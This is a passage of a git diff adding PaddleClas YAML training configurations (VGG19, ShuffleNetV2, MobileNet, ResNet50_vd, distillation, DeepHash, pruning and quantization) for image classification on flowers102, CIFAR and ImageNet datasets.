+valid_interval: 1 +epochs: 20 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.0005 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.00001 + +TRAIN: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. 
+ mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG19_finetune_kunlun.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG19_finetune_kunlun.yaml new file mode 100644 index 0000000..6ba38b9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/kunlun/VGG19_finetune_kunlun.yaml @@ -0,0 +1,70 @@ +mode: 'train' +ARCHITECTURE: + name: 'VGG19' + params: + stop_grad_layers: 5 +pretrained_model: "./pretrained/VGG19_pretrained" +model_save_dir: "./output/" +classes_num: 102 +total_images: 1020 +save_interval: 1 +validate: True +valid_interval: 1 +epochs: 20 +topk: 5 +image_shape: [3, 224, 224] + +LEARNING_RATE: + function: 'Cosine' + params: + lr: 0.0005 + +OPTIMIZER: + function: 'Momentum' + params: + momentum: 0.9 + regularizer: + function: 'L2' + factor: 0.00001 + +TRAIN: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/train_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1./255. 
+ mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +VALID: + batch_size: 20 + num_workers: 0 + file_list: "./dataset/flowers102/val_list.txt" + data_dir: "./dataset/flowers102/" + shuffle_seed: 0 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/new_user/ShuffleNetV2_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/new_user/ShuffleNetV2_x0_25.yaml new file mode 100644 index 0000000..f58522c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/new_user/ShuffleNetV2_x0_25.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: cpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 20 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ShuffleNetV2_x0_25 + class_num: 102 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.0125 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: 
DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/flowers102/ + cls_label_path: ./dataset/flowers102/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV1_multilabel.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV1_multilabel.yaml new file mode 100644 index 0000000..6838710 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV1_multilabel.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 10 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + use_multilabel: True +# model architecture +Arch: + name: MobileNetV1 + class_num: 33 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - 
MultiLabelLoss: + weight: 1.0 + Eval: + - MultiLabelLoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: MultiLabelDataset + image_root: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/images/ + cls_label_path: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/multilabel_train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: MultiLabelDataset + image_root: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/images/ + cls_label_path: ./dataset/NUS-WIDE-SCENE/NUS-SCENE-dataset/multilabel_test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: ./deploy/images/0517_2715693311.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: MultiLabelTopk + topk: 5 + class_id_map_file: None + +Metric: + Train: + - HammingDistance: + - AccuracyScore: + Eval: + - HammingDistance: + - AccuracyScore: diff --git 
a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV3_large_x1_0_CIFAR100_finetune.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV3_large_x1_0_CIFAR100_finetune.yaml new file mode 100644 index 0000000..f0b864d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/MobileNetV3_large_x1_0_CIFAR100_finetune.yaml @@ -0,0 +1,127 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 100 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 
0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/R50_vd_distill_MV3_large_x1_0_CIFAR100.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/R50_vd_distill_MV3_large_x1_0_CIFAR100.yaml new file mode 100644 index 0000000..b2447c2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/R50_vd_distill_MV3_large_x1_0_CIFAR100.yaml @@ -0,0 +1,151 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: "./inference" + +# model architecture +Arch: + name: "DistillationModel" + # if not null, its lengths should be same as models + pretrained_list: + # if not null, its lengths should be same as models + freeze_params_list: + - True + - False + models: + - Teacher: + name: ResNet50_vd + class_num: 100 + pretrained: "./pretrained/best_model" + - Student: + name: MobileNetV3_large_x1_0 + class_num: 100 + pretrained: True + + infer_model_name: "Student" + + +# loss function config for traing/eval process +Loss: + Train: + - DistillationCELoss: + weight: 1.0 + model_name_pairs: + - ["Student", 
"Teacher"] + Eval: + - DistillationGTCELoss: + weight: 1.0 + model_names: ["Student"] + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: "./dataset/CIFAR100/" + cls_label_path: "./dataset/CIFAR100/train_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: "./dataset/CIFAR100/" + cls_label_path: "./dataset/CIFAR100/test_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Infer: + infer_imgs: "docs/images/whl/demo.jpg" + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: DistillationPostProcess + func: Topk + topk: 5 + +Metric: + Train: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] + Eval: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_CIFAR100.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_CIFAR100.yaml new file mode 100644 index 0000000..3977969 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_CIFAR100.yaml @@ -0,0 +1,127 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + class_num: 100 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: 
DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_mixup_CIFAR100_finetune.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_mixup_CIFAR100_finetune.yaml new file mode 100644 index 0000000..3e09ae5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_mixup_CIFAR100_finetune.yaml @@ -0,0 +1,127 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + class_num: 100 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + 
scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/VGG19_CIFAR10_DeepHash.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/VGG19_CIFAR10_DeepHash.yaml new file mode 100644 index 0000000..9722882 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/VGG19_CIFAR10_DeepHash.yaml @@ -0,0 +1,147 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + eval_mode: "retrieval" + epochs: 128 + print_batch_step: 10 + use_visualdl: False + + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + + #feature postprocess + 
feature_normalize: False + feature_binarize: "round" + +# model architecture +Arch: + name: "RecModel" + Backbone: + name: "VGG19Sigmoid" + pretrained: True + class_num: 48 + Head: + name: "FC" + class_num: 10 + embedding_size: 48 + + infer_output_key: "features" + infer_add_softmax: "false" + +# loss function config for train/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.01 + decay_epochs: [200] + values: [0.01, 0.001] + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/cifar10/ + cls_label_path: ./dataset/cifar10/cifar10-2/train.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 256 + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + Query: + dataset: + name: ImageNetDataset + image_root: ./dataset/cifar10/ + cls_label_path: ./dataset/cifar10/cifar10-2/test.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: ImageNetDataset + image_root: ./dataset/cifar10/ + cls_label_path: ./dataset/cifar10/cifar10-2/database.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 
0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - mAP: + - Precisionk: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_prune.yaml new file mode 100644 index 0000000..958a136 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_prune.yaml @@ -0,0 +1,139 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantization or prune model +Slim: + ## for prune + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 1000 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.65 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: 
False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_quantization.yaml new file mode 100644 index 0000000..6839998 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_quantization.yaml @@ -0,0 +1,138 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 60 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantization or prune model +Slim: + ## for quantization + quant: + name: pact + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 1000 + pretrained: True + +# 
loss function config for training/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.065 + warmup_epoch: 0 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git 
a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_prune.yaml new file mode 100644 index 0000000..fd7d26b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_prune.yaml @@ -0,0 +1,138 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantization or prune model +Slim: + ## for prune + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: ResNet50_vd + class_num: 1000 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + 
